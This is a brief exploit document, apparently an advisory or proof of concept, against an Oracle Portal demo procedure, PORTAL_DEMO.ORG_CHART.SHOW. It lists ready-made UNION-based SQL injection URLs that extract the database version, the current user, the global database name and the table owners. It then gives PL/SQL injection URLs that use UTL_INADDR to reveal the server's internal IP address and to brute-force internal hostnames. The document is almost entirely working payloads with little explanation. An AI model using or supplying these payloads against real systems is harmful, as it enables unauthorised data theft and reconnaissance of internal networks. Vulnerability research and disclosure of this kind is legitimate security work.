*** SQL Injection ***
Version:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+banner,null,null,null,null+from+v$version--
User:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+user,null,null,null,null+from+dual--
Actual Database:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+global_name,null,null,null,null+from+global_name--
Lists of Databases:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+owner,null,null,null,null+from+all_tables--
*** PL/SQL Injection ***
For example, using the function UTL_INADDR.get_host_address we can found the internal address:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+UTL_INADDR.get_host_address,null,null,null,null+from+dual--
Using a bruteforce attack on the range obtained and the function
UTL_INADDR.get_host_name(), we can acquire a list of internal hosts:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value
%27union+select+UTL_INADDR.get_host_name('INTERNALs-IP'),null,null,null,null+from+dual--
